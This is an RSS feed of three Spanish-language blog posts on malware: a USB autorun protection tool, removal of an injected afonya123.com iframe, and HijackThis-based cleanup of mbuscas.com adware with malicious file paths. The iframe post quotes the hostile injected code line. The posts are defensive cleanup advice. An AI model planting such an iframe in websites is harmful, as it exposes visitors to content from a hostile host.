<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>XARCOM Blog &#187; Virus</title>
	<atom:link href="http://www.xarcom.net/blog/index.php/category/virus/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.xarcom.net/blog</link>
	<description>Aquello que querías saber y nadie te explicó</description>
	<lastBuildDate>Mon, 23 Jan 2012 21:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>ANTIRUN AutoRun Virus Protection for USB Drive</title>
		<link>http://www.xarcom.net/blog/index.php/antirun-autorun-virus-protection-for-usb-drive/</link>
		<comments>http://www.xarcom.net/blog/index.php/antirun-autorun-virus-protection-for-usb-drive/#comments</comments>
		<pubDate>Thu, 29 Sep 2011 09:04:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Virus]]></category>
		<category><![CDATA[Antirun]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.xarcom.net/blog/?p=953</guid>
		<description><![CDATA[Esta modalidad de contagio de virus a través de los USB Drives cada vez está más de moda, la verdad es que es efectiva, a quien no le suena la frase &#8220;Nadie tiene un PenDrive para guardar estas fotos?&#8221;, muchísimos &#8230; <a href="http://www.xarcom.net/blog/index.php/antirun-autorun-virus-protection-for-usb-drive/">Sigue leyendo <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Esta modalidad de contagio de virus a través de los USB Drives cada vez está más de moda, la verdad es que es efectiva, a quien no le suena la frase &#8220;Nadie tiene un PenDrive para guardar estas fotos?&#8221;, muchísimos ordenadores están infectados sin saberlo, y tontamente se van traspasando los diferentes tipos de virus por el AutoRun del sistema. Pues bien, estos señores de antirun.net trabajan en la solución a este tremendo problema y ya acaban de sacar a la luz la versión 2.3 totalmente estable, y además gratuita, que soporta Windows XP, Windows Vista y Windows 7.</p>
<p>Yo lo he instalado y os animo a ponerla, hay muy buenas críticas por la red, aunque a mi no me detectó nada afortunadamente <img src='http://www.xarcom.net/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Aquí se ve como está instalado en el sistray icons</p>
<p><a href="http://antirun.net/index.php"><img class="aligncenter size-full wp-image-954" title="Antirun Instalado en W7" src="http://www.xarcom.net/blog/wp-content/uploads/2011/09/Antirun-Instalado-en-W7.png" alt="Este es el icono de Antirun intalado" width="272" height="116" /></a></p>
<p>Aquí veréis su configuración que es sencillísima</p>
<p><a href="http://www.xarcom.net/blog/wp-content/uploads/2011/09/Antirun-configuracion.png"><img class="aligncenter" title="Antirun configuracion" src="http://www.xarcom.net/blog/wp-content/uploads/2011/09/Antirun-configuracion.png" alt="" width="390" height="378" /></a></p>
<p>Y aquí veréis que realmente que el Pen USB de 8Gigas que me regaló  &#8220;el Tio Alberto&#8221;, está totalmente limpio.</p>
<p>Ya me diréis si os ha sido de utilidad.</p>
<p>Hasta pronto.</p>
<p><a title="ANTIRUN AutoRun Virus Protection for USB Drive" href="http://www.xarcom.net" target="_blank">ANTIRUN AutoRun Virus Protection for USB Drive</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.xarcom.net/blog/index.php/antirun-autorun-virus-protection-for-usb-drive/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>IFRAME afonya123.com</title>
		<link>http://www.xarcom.net/blog/index.php/iframe-afonya123-com/</link>
		<comments>http://www.xarcom.net/blog/index.php/iframe-afonya123-com/#comments</comments>
		<pubDate>Tue, 16 Mar 2010 10:42:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Virus]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://www.xarcom.net/blog/?p=521</guid>
		<description><![CDATA[IFRAME afonya123.com Esta es una infección por iframe, afonya123.com se incluye en el final de las páginas web con el siguiente código: &#60;iframe src=&#8221;http://afonya123.com/r/g.php&#8221; width=&#8221;5&#8243; height=&#8221;4&#8243; align=&#8221;right&#8221;&#62;&#60;/iframe&#62; Este código tiene una longitud de 79 bytes. afonya123.com es relativamente nuevo, se tiene información &#8230; <a href="http://www.xarcom.net/blog/index.php/iframe-afonya123-com/">Sigue leyendo <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<h1><span style="color: #3366ff;">IFRAME afonya123.com</span></h1>
<p><span style="color: #000000;">Esta es una infección por iframe, afonya123.com se incluye en el final de las páginas web con el siguiente código:</span></p>
<p><span style="color: #000000;"><span style="font-family: courier;">&lt;iframe src=&#8221;http://afonya123.com/r/g.php&#8221; width=&#8221;5&#8243; height=&#8221;4&#8243; align=&#8221;right&#8221;&gt;&lt;/iframe&gt;</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Courier;">Este código tiene una longitud de 79 bytes. afonya123.com es relativamente nuevo, se tiene información de este código desde el 14/03/2010. No es maligno, simplemente es escandaloso.</span></span></p>
<p><span style="color: #000000;"> </span><span style="color: #000000;"><span style="font-family: Courier;">afonya123.com responde a la IP 61.4.82.213 situada en Beiging (China), os recomendaría que excluyéseis esta IP en vuestro FTP Server</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Courier;">Simplemente se quita esta linea de texto y todo vuelve a funcionar</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Courier;">Espero haberos ayudado a quitar afonya123.com</span></span></p>
<p><span style="color: #000000;"><a title="IFRAME afonya123.com" href="http://www.xarcom.net" target="_blank"> IFRAME afonya123.com</a></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.xarcom.net/blog/index.php/iframe-afonya123-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>mbuscas.com adware &#8211; como quitarlo</title>
		<link>http://www.xarcom.net/blog/index.php/mbuscas-com-adware-como-quitarlo/</link>
		<comments>http://www.xarcom.net/blog/index.php/mbuscas-com-adware-como-quitarlo/#comments</comments>
		<pubDate>Tue, 24 Nov 2009 19:13:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.xarcom.net/blog/?p=458</guid>
		<description><![CDATA[Elimininar mbuscas.com Es un adware que secuestra la página de inicio del navegador y la redirige a www.mbuscas.com Por su arquitectura tiene efectos de Trojan.Downloader y se puede descargar los sigueintes virus, troyanos y gusanos, de esta maner infecta el &#8230; <a href="http://www.xarcom.net/blog/index.php/mbuscas-com-adware-como-quitarlo/">Sigue leyendo <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<h1><span style="color: #3366ff;">Elimininar mbuscas.com</span></h1>
<p>Es un adware que secuestra la página de inicio del navegador y la redirige a <span style="color: #3366ff;">www.mbuscas.com</span></p>
<p>Por su arquitectura tiene efectos de Trojan.Downloader y se puede descargar los sigueintes virus, troyanos y gusanos, de esta maner infecta el pc con:</p>
<p>&#8220;<span style="color: #ff0000;">PWSteal.Changgame</span>&#8220;: Ubicación C:\Windows\System32\<span style="color: #3366ff;">RUNDDLL32.exe</span></p>
<p>&#8220;<span style="color: #ff0000;">Bancos-CH&#8221; o &#8220;Bancos-CW</span>&#8221; : Ubicación C:\Windows\System32\<span style="color: #3366ff;">IEXPLORER.exe</span></p>
<p>&#8220;<span style="color: #ff0000;">W32.Spybot.Worm</span>&#8221; o &#8220;<span style="color: #ff0000;">Troj/IRCBot-WG</span>&#8220;: Ubicación C:\Windows\System32\<span style="color: #3366ff;">EEXPLORER.exe</span></p>
<p>&#8220;<span style="color: #ff0000;">W32.Spybot.Worm</span>&#8221; o &#8220;<span style="color: #ff0000;">Troj/IRCBot-WG</span>&#8220;: Ubicación C:\Windows\System32\<span style="color: #3366ff;">EXPLORERR.exe</span></p>
<p><span style="color: #3366ff;"> </span> </p>
<p>Proceso de Desinfección de mbuscas.com</p>
<p><strong>1.-</strong> Descarga el programa HijackThis</p>
<p>Descomprime el archivo y copialo dentro de una carpeta en C:\HijackThis, antes deberás de crear la carpeta.</p>
<p>Ejecuta HijackThis.exe desde la carpeta de C:\HijackThis.</p>
<p>En la ventana del programa pulsa sobre &#8220;Do a system scan only&#8221;</p>
<p>Marca en el log que genere HijackThis las entradas que se indican a continuación, y al finalizar haz click en &#8220;Fix Checked&#8221;</p>
<p>RO &#8211; HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [www.mbuscas.com]</p>
<p>RO &#8211; HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://www.mbuscas.com/buscador.html">http://www.mbuscas.com/buscador.html</a></p>
<p>R3 &#8211; URLSearchHook: Search Settings Class &#8211; {E312764E-7706-43F1-8DAB-FCDD2B1E416D} &#8211; C:\Archivos de programa\Search Settings\kb126\Search Settings.dll</p>
<p>O2 &#8211; BHO: SearchSettings Class &#8211; {E312764E-7706-43F1-8DAB-FCDD2B1E416D}- C:\Archivos de programa\Search Settings\kb126\Search Settings.dll</p>
<p>O3 &#8211; Toolbar: Dealio &#8211; {E67C74F4-A00A-4F2C-9FEC-FD9DC004A67F} &#8211; C:\Archivos de programa\Dealio\kb126\Dealio.dll</p>
<p>O4 &#8211; HKLM\..\Run: [au] C:\Archivos de programa\Dealio\DealioAU.exe</p>
<p>O4 &#8211; HKLM\..\Run: [SearchSettings] C:\Archivos de programa\Search Settings\SearchSettings.exe</p>
<p>O4 &#8211; HKLM\..\Run: [Rundll32] C:\Windows\System32\RUNDDLL32.exe</p>
<p>020 &#8211; Winlogon Notify: Wgalogon &#8211; C:\WINDOWS\</p>
<p><strong>2.-</strong> Descargar Unlocker de <a href="http://ccollomb.free.fr/unlocker/">http://ccollomb.free.fr/unlocker/</a></p>
<p>Y eliminar los archivos que están en C:\Windows\System32 (Lista de abajo)</p>
<p>&#8220;<span style="color: #ff0000;">PWSteal.Changgame</span>&#8220;: Ubicación C:\Windows\System32\<span style="color: #3366ff;">RUNDDLL32.exe</span></p>
<p>&#8220;<span style="color: #ff0000;">Bancos-CH&#8221; o &#8220;Bancos-CW</span>&#8221; : Ubicación C:\Windows\System32\<span style="color: #3366ff;">IEXPLORER.exe</span></p>
<p>&#8220;<span style="color: #ff0000;">W32.Spybot.Worm</span>&#8221; o &#8220;<span style="color: #ff0000;">Troj/IRCBot-WG</span>&#8220;: Ubicación C:\Windows\System32\<span style="color: #3366ff;">EEXPLORER.exe</span></p>
<p>&#8220;<span style="color: #ff0000;">W32.Spybot.Worm</span>&#8221; o &#8220;<span style="color: #ff0000;">Troj/IRCBot-WG</span>&#8220;: Ubicación C:\Windows\System32\<span style="color: #3366ff;">EXPLORERR.exe</span></p>
<p><span style="color: #3366ff;"><span style="color: #000000;"><strong>3.- </strong>Reiniciar el PC para que Unlocker pueda borrar estos archivos.</span></span></p>
<p><span style="color: #3366ff;"><span style="color: #000000;"> </span></span></p>
<p><span style="color: #3366ff;"><span style="color: #000000;"><a title="mbuscas.com adware - como quitarlo" href="http://www.xarcom.net" target="_blank">mbuscas.com adware &#8211; como quitarlo</a></span></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.xarcom.net/blog/index.php/mbuscas-com-adware-como-quitarlo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

